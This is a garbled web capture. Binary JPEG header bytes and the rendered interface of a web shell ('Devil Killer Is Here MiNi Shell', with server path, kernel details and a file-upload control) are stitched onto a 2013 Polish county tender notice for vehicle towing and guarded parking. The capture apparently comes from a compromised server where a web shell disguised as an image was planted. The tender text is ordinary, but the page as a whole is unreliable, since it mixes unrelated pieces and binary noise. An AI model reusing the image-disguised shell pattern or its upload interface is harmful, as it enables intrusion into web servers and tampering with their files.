JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/27077-N-2013.html

<p class="kh_header"><b>Pszczyna: Świadczenie kompleksowych usług w zakresie usuwania pojazdów z dróg położonych na obszarze Powiatu Pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym.</b><br>
<b>Numer ogłoszenia: 27077 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług w zakresie usuwania pojazdów z dróg położonych na obszarze Powiatu Pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
Świadczenie kompleksowych usług w zakresie usuwania pojazdów z dróg położonych na obszarze Powiatu Pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.).
2. Ze względu na uchwałę Rady Powiatu Pszczyńskiego nr XXIII/206/12 (załącznik nr 8 do SIWZ) w sprawie: ustalenia wysokości opłat i przechowywanie pojazdów oraz      wysokości kosztów w przypadku odstąpienia od usunięcia pojazdu w roku 2013      Zamawiający informuje, że zaproponowane w ofercie ceny jednostkowe usługi nie mogą być wyższe niż odpowiednio przyjęte w uchwale (załącznik nr 8 do SIWZ), gdyż będą wówczas pozostawały w sprzeczności z art. 130 a ustawy Prawo o ruchu drogowym. 
3. Ze względu na charakter usługi całość zamówienia podzielono na trzy odrębne części, 
    dopuszczając możliwość ubiegania się o każdą z części zamówienia z osobna:

a.	CZĘŚĆ A - pojazdy do 3,5 t:
Świadczenie kompleksowych usług w zakresie usuwania pojazdów 
o dopuszczalnej masie całkowitej nieprzekraczającej 3,5t z dróg położonych na obszarze Powiatu Pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie Powiatu Pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo 
o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.)
b.	CZĘŚĆ B - pojazdy powyżej 3,5 t:
Świadczenie kompleksowych usług w zakresie usuwania pojazdów 
o dopuszczalnej masie całkowitej powyżej 3,5t z dróg położonych na obszarze Powiatu Pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie powiatu pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.).
c.	CZĘŚĆ C - pojazdy przewożące materiały niebezpieczne, 
Świadczenie kompleksowych usług w zakresie usuwania pojazdów przewożących materiały niebezpieczne z dróg położonych na obszarze Powiatu Pszczyńskiego 
i całodobowe przechowywanie ich na parkingu strzeżonym, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.).
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Wartość zamówienia nie przekracza kwot określonych w przepisach wydanych na podstawie  art. 11 ust. 8 ustawy Prawo Zamówień Publicznych ustawy z dnia   29 stycznia 2004r. - Prawo Zamówień Publicznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości dokonania zamówień uzupełniających na zasadach określonych w art. 67 ust.1 pkt 6 ustawy Prawo Zamówień Publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.04.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości:                            
a. 	dla części A - pojazdy do 3,5 t: 1.500,00 zł (słownie: jeden tysiąc pięćset złotych)
b. 	dla części B - pojazdy powyżej 3,5 t: 800,00 zł (słownie: osiemset złotych)
c. 	dla części C - pojazdy przewożące materiały niebezpieczne - 350,00 zł (słownie: trzysta pięćdziesiąt złotych)
w terminie do dnia 28.02.2013r. do godz. 1000).
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu.
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.	gwarancjach bankowych
d.	gwarancjach ubezpieczeniowych, 
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42 poz. 275).
4.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 9.
5.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
6.	Za skutecznie wniesione wadium zamawiający uzna wadium wniesione:
a.	w pieniądzu, jeśli środki te zostały zarachowane na rachunku zamawiającego 
w Banku Spółdzielczym w Pszczynie, numer konta bankowego: 18 8448 0004 0006 1229 2033 0007; w terminie zgodnym z pkt 1.
b.	w poręczeniach oraz gwarancjach bankowych lub ubezpieczeniowych, poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej w terminie zgodnym z punktem 1 - w kasie Starostwa Powiatowego w Pszczynie.
c.	w poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dn. 9.11.2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w kasie Starostwa Powiatowego w Pszczynie  pok. 30, 
w terminie zgodnym z pkt. 1.
7.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek wskazany przez Zamawiającego w pkt. 6a.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.
11.	 Zamawiający wykluczy z postępowania wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy PZP, albo nie zgodzili się na przedłużenie okresu związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać ważną licencję na wykonywanie transportu drogowego w zakresie przewozu rzeczy wydaną na podstawie przepisów ustawy z dnia 6 września 2011r. o transporcie drogowym (Dz.U. z 2012r., poz. 1265 z późn.zm.). 
Zamawiający wymaga przedłożenia w/w licencji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	W celu potwierdzenia, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga złożenia następujących dokumentów:

Dla części A - pojazdy do 3,5 t.

a.	Wykazu pojazdów, tj. dostępnego Wykonawcy potencjału technicznego w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. Warunek minimalny Zamawiającego: 2 pojazdy pomocy drogowej 
z platformą, zaopatrzone w wyciągarkę do transportu pojazdów o dopuszczalnej masie całkowitej do 3,5 tony włącznie. 
Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa wyżej polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia 
w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 3, 3a do SIWZ Oświadczenie innego podmiotu.
Wszystkie pojazdy pomocy drogowej powinny spełniać warunki dodatkowe Działu III, Rozdziału 9 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. 
w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. z 2003r., nr 32, poz. 262 z późn.zm.), posiadać w całym okresie trwania umowy aktualne okresowe badanie techniczne oraz ubezpieczenie od odpowiedzialności cywilnej właściciela pojazdu.

b.	Oświadczenia o dysponowaniu parkingiem strzeżonym spełniającym poniższe kryteria:
b.1. parking strzeżony całodobowo (monitoring elektroniczny lub ochrona
                  fizyczna), usytuowany na terenie powiatu pszczyńskiego,
b.2. trwale ogrodzony (metalowe lub betonowe ogrodzenie o wysokości co
                 najmniej 1,5m), 
b.3.  zamykany w sposób uniemożliwiający wjazd i wyjazd pojazdu bez obecności
                 osoby dozorującej, utwardzony,
b.4.  możliwość  zabezpieczenia rowerów, motorowerów, motocykli i samochodów
                 z uszkodzeniami powypadkowymi przed opadami atmosferycznymi,
b.5. oświetlenie lampami zamocowanymi na odpowiedniej wysokości i w ilości 
                 umożliwiającej w nocy skuteczną obserwację znajdujących się na parkingu 
                 pojazdów,
b.6.  wyposażenie w sprzęt przeciwpożarowy,
b.7.  posiadający minimum 10 miejsc do parkowania przechowywanych pojazdów
	zgodnie z załącznikiem nr 4 do SIWZ.

c. W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien załączyć do oferty fotografie 
o wymiarach min. 10 x 15cm, na których widoczne będą: utwardzony plac parkingowy, ogrodzenie parkingu, bramy wjazdowe, oświetlenie parkingu oraz pojazdy zamieszczone w wykazie załączonym do oferty.
Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w p.pkt b; c  polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia 
w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 4, 4a do SIWZ Oświadczenie innego podmiotu.

Dla części B - pojazdy powyżej 3,5 t.

a.	  Wykazu pojazdów, tj. dostępnego Wykonawcy potencjału technicznego w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. 
Warunek minimalny Zamawiającego: 
 a.1. 1 pojazd pomocy drogowej do przewozu lub holowania pojazdów o 
        dopuszczalnej masie całkowitej do 16 ton
 a.2. 1 pojazd pomocy drogowej do przewozu lub holowania pojazdów o 
        dopuszczalnej masie całkowitej powyżej 16 ton

Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa wyżej polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia 
w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 3, 3a do SIWZ Oświadczenie innego podmiotu.
Wszystkie pojazdy pomocy drogowej powinny spełniać warunki dodatkowe Działu III, Rozdziału 9 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. 
w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. z 2003r., nr 32, poz. 262 z późn.zm.), posiadać w całym okresie trwania umowy aktualne okresowe badanie techniczne oraz ubezpieczenie od odpowiedzialności cywilnej właściciela pojazdu

b.	 Oświadczenia o dysponowaniu parkingiem strzeżonym spełniającym poniższe kryteria:
b.1. parking strzeżony całodobowo (monitoring elektroniczny lub ochrona
                  fizyczna), usytuowany na terenie powiatu pszczyńskiego,
b.2. trwale ogrodzony (metalowe lub betonowe ogrodzenie o wysokości co
                  najmniej 1,5m), 
b.3.  zamykany w sposób uniemożliwiający wjazd i wyjazd pojazdu bez obecności
                 osoby dozorującej, utwardzony,
b.4. możliwość  zabezpieczenia rowerów, motorowerów, motocykli i samochodów
                 z uszkodzeniami powypadkowymi przed opadami atmosferycznymi,
b.5. oświetlenie lampami zamocowanymi na odpowiedniej wysokości i w ilości 
                  umożliwiającej w nocy skuteczną obserwację znajdujących się na parkingu 
                 pojazdów,
b.6. wyposażenie w sprzęt przeciwpożarowy,
b.7. posiadający minimum 6 miejsc do parkowania przechowywanych pojazdów
zgodnie z załącznikiem nr 4 do SIWZ.

c. W celu potwierdzenie, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien załączyć do oferty fotografie 
o wymiarach min. 10 x 15cm, na których widoczne będą: utwardzony plac parkingowy, ogrodzenie parkingu, bramy wjazdowe, oświetlenie parkingu oraz pojazdy zamieszczone w wykazie załączonym do oferty.

Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w p.pkt b; c  polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 4, 4a do SIWZ Oświadczenie innego podmiotu.

Dla części C - pojazdy przewożące materiały niebezpieczne.

a. Wykazu pojazdów, tj. dostępnego Wykonawcy potencjału technicznego w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. 
Warunek minimalny Zamawiającego: 
a.1. 1 pojazd pomocy drogowej z platformą, zaopatrzony w  wyciągarkę do 
        transportu pojazdów o dopuszczalnej masie całkowitej do 3,5 tony włącznie,
a.2. 1 pojazd pomocy drogowej do przewozu lub holowania pojazdów o 
        dopuszczalnej masie całkowitej do 16 ton
a.3. 1 pojazd pomocy drogowej do przewozu lub holowania pojazdów o 
        dopuszczalnej masie całkowitej powyżej 16 ton.
W/w pojazdy muszą posiadać świadectwa dopuszczenia pojazdu ADR dla wszystkich pojazdów stwierdzające spełnienie warunków pojazdów AT, FL, EX II 
i EX III.

Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa wyżej polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia 
w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 3, 3a do SIWZ Oświadczenie innego podmiotu.

Wszystkie pojazdy pomocy drogowej powinny spełniać warunki dodatkowe Działu III, Rozdziału 9 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. 
w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. z 2003r., nr 32, poz. 262 z późn.zm.), posiadać w całym okresie trwania umowy aktualne okresowe badanie techniczne oraz ubezpieczenie od odpowiedzialności cywilnej właściciela pojazdu. Wszystkie pojazdy muszą spełniać warunki Umowy europejskiej dotyczącej międzynarodowego przewozu drogowego towarów niebezpiecznych (ADR), sporządzonej w Genewie dnia 30 września 1957 r. z aktualnymi zmianami.

b. Oświadczenia o dysponowaniu parkingiem strzeżonym spełniającym poniższe kryteria:
b.1. parking strzeżony całodobowo (monitoring elektroniczny lub ochrona
                  fizyczna),
b.2. trwale ogrodzony (metalowe lub betonowe ogrodzenie o wysokości co
                  najmniej 1,5m), 
b.3.  zamykany w sposób uniemożliwiający wjazd i wyjazd pojazdu bez obecności
                 osoby dozorującej, utwardzony,
b.4. możliwość  zabezpieczenia rowerów, motorowerów, motocykli i samochodów
                 z uszkodzeniami powypadkowymi przed opadami atmosferycznymi,
b.5. oświetlenie lampami zamocowanymi na odpowiedniej wysokości i w ilości 
                  umożliwiającej w nocy skuteczną obserwację znajdujących się na parkingu 
                 pojazdów,
b.6. wyposażenie w sprzęt przeciwpożarowy,
b.7. posiadający minimum 4 miejsca do parkowania przechowywanych pojazdów.
b.8. parking musi spełniać wszystkie warunki określone w Rozporządzeniu Ministra
                spraw Wewnętrznych z dnia 13 listopada 2012r. w sprawie warunków
                technicznych parkingów, na które są usuwane pojazdy przewożące towary 
                niebezpieczne (Dz.U. z 2012r., poz. 1293). Zamawiający zastrzega sobie
                prawo szczegółowej kontroli spełnienia tych warunków przed podpisaniem
                umowy.
	zgodnie z załącznikiem nr 4 do SIWZ.

c.	W celu potwierdzenie, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien załączyć do oferty fotografie 
o wymiarach min. 10 x 15cm, na których widoczne będą: utwardzony plac parkingowy, ogrodzenie parkingu, bramy wjazdowe, oświetlenie parkingu oraz pojazdy zamieszczone w wykazie załączonym do oferty.

Jeżeli Wykonawca wykazując spełnianie warunku określone w pkt b i c, polega na potencjale technicznym innego podmiotu na zasadach określonych w art. 26 ust. 2b ustawy PZP,  Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów pisemnego zobowiązania do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wymagane jest załączenie do oferty odpowiednio załącznika nr 4, 4a do SIWZ Oświadczenie innego podmiotu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, których przedłożenia w ofercie żąda Zamawiający:  Formularz ofertowy - załącznik nr 2 do SIWZ.
Inne oświadczenia i dokumenty, które Zamawiający zaleca załączyć do oferty:
Zaświadczenie o wpisie do ewidencji działalności gospodarczej - służy właściwej weryfikacji należytej reprezentacji podmiotu, przedłożenie dokumentu umożliwi Zamawiającemu dokonanie oceny czy osoba fizyczna, składająca oświadczenie woli w postaci oferty w postępowaniu o udzielenie zamówienia publicznego, prowadzi działalność gospodarczą zarejestrowaną  przez właściwy organ. Zamawiający dokonując oceny oferty musi mieć jednoznaczną informację o statusie cywilnoprawnym wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


